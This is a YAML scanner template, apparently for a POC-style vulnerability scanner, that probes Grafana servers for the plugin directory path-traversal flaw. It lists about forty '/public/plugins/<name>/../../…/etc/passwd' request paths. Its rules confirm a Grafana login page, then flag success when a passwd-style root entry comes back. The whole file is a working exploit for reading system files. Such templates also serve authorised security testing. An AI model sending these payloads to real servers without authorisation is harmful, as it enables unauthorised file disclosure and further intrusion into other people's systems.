name: grafana-file-read
sets:
  path:
    - /public/plugins/alertlist/../../../../../../../../../../../etc/passwd
    - /public/plugins/annolist/../../../../../../../../../../../etc/passwd
    - /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
    - /public/plugins/barchart/../../../../../../../../../../../etc/passwd
    - /public/plugins/bargauge/../../../../../../../../../../../etc/passwd
    - /public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
    - /public/plugins/dashlist/../../../../../../../../../../../etc/passwd
    - /public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
    - /public/plugins/gauge/../../../../../../../../../../../etc/passwd
    - /public/plugins/geomap/../../../../../../../../../../../etc/passwd
    - /public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
    - /public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
    - /public/plugins/graph/../../../../../../../../../../../etc/passwd
    - /public/plugins/graphite/../../../../../../../../../../../etc/passwd
    - /public/plugins/heatmap/../../../../../../../../../../../etc/passwd
    - /public/plugins/histogram/../../../../../../../../../../../etc/passwd
    - /public/plugins/influxdb/../../../../../../../../../../../etc/passwd
    - /public/plugins/jaeger/../../../../../../../../../../../etc/passwd
    - /public/plugins/logs/../../../../../../../../../../../etc/passwd
    - /public/plugins/loki/../../../../../../../../../../../etc/passwd
    - /public/plugins/mssql/../../../../../../../../../../../etc/passwd
    - /public/plugins/mysql/../../../../../../../../../../../etc/passwd
    - /public/plugins/news/../../../../../../../../../../../etc/passwd
    - /public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
    - /public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
    - /public/plugins/piechart/../../../../../../../../../../../etc/passwd
    - /public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
    - /public/plugins/postgres/../../../../../../../../../../../etc/passwd
    - /public/plugins/prometheus/../../../../../../../../../../../etc/passwd
    - /public/plugins/stat/../../../../../../../../../../../etc/passwd
    - /public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
    - /public/plugins/status-history/../../../../../../../../../../../etc/passwd
    - /public/plugins/table/../../../../../../../../../../../etc/passwd
    - /public/plugins/table-old/../../../../../../../../../../../etc/passwd
    - /public/plugins/tempo/../../../../../../../../../../../etc/passwd
    - /public/plugins/testdata/../../../../../../../../../../../etc/passwd
    - /public/plugins/text/../../../../../../../../../../../etc/passwd
    - /public/plugins/timeseries/../../../../../../../../../../../etc/passwd
    - /public/plugins/welcome/../../../../../../../../../../../etc/passwd
    - /public/plugins/zipkin/../../../../../../../../../../../etc/passwd
rules:
  - method: GET
    path: "/login"
    expression: |
      response.status == 200 && response.body.bcontains(b'<title>Grafana</title>')
  - method: GET
    path:  "{{path}}"
    expression: |
      response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
detail:
  author: 666